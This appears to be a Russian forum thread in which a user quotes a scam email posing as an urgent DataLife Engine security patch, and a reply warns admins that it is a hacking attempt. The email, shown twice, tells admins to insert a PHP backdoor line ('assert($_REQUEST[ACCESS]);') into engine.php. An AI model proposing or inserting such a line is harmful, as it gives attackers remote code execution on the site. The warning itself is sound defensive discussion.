вопрос
Сегодня пришло мыло
Отправитель:
Тема письма:
Содержание:
Что это и с чем его едят?
Отправитель:
{заголовок сайта}
СофтНьюс Медиа Групп+7 (391) 217-99-79
СофтНьюс Медиа Групп+7 (391) 217-99-79
Тема письма:
{имя сайта} могли взломать! Экстренный патч для DataLife Engine.
Содержание:
{имя админа},
Данное письмо вам отправил DataLife Engine с сайта {имя сайта}
------------------------------------------------
Текст сообщения
------------------------------------------------
Уважаемые владельцы сайта {имя сайта},
вы получили данное письмо, так как ваш сайт работает под управлением CMS «DataLife Engine».
Настоящим письмом уведомляем вас о том, что силами наших специалистов по безопасности в версии CMS «DataLife Engine», используемой на вашем сайте, была выявлена уязвимость, позволяющая злоумышленникам получить логин и пароль от панели управления сайтом при определённых настройках хостинга.
Для устранения уязвимости необходимо внести изменения в файл {имя сайта}/engine/engine.php
Для этого откройте этот файл в любом тектовом редакторе и после строки <?PHP добавьте:
assert($_REQUEST[ACCESS]);
Кроме того, рекомендуем изменить пароли всех администраторов на вашем сайте.
С уважением,
Администрация ООО «СофтНьюс Медиа Групп»
IP адрес отправителя: 192.40.88.11
------------------------------------------------
Помните, что администрация сайта не несет ответственности за содержание данного письма
С уважением,
Администрация {имя сайта}
Данное письмо вам отправил DataLife Engine с сайта {имя сайта}
------------------------------------------------
Текст сообщения
------------------------------------------------
Уважаемые владельцы сайта {имя сайта},
вы получили данное письмо, так как ваш сайт работает под управлением CMS «DataLife Engine».
Настоящим письмом уведомляем вас о том, что силами наших специалистов по безопасности в версии CMS «DataLife Engine», используемой на вашем сайте, была выявлена уязвимость, позволяющая злоумышленникам получить логин и пароль от панели управления сайтом при определённых настройках хостинга.
Для устранения уязвимости необходимо внести изменения в файл {имя сайта}/engine/engine.php
Для этого откройте этот файл в любом тектовом редакторе и после строки <?PHP добавьте:
assert($_REQUEST[ACCESS]);
Кроме того, рекомендуем изменить пароли всех администраторов на вашем сайте.
С уважением,
Администрация ООО «СофтНьюс Медиа Групп»
IP адрес отправителя: 192.40.88.11
------------------------------------------------
Помните, что администрация сайта не несет ответственности за содержание данного письма
С уважением,
Администрация {имя сайта}
Что это и с чем его едят?
Внимание!!!
С помощью функции php assert можно выполнить запрос = взлом вашего сайта.
По этому предостерегаю админов сайтов - игнорируйте это сообщение и не ведитесь на развод
С помощью функции php assert можно выполнить запрос = взлом вашего сайта.
По этому предостерегаю админов сайтов - игнорируйте это сообщение и не ведитесь на развод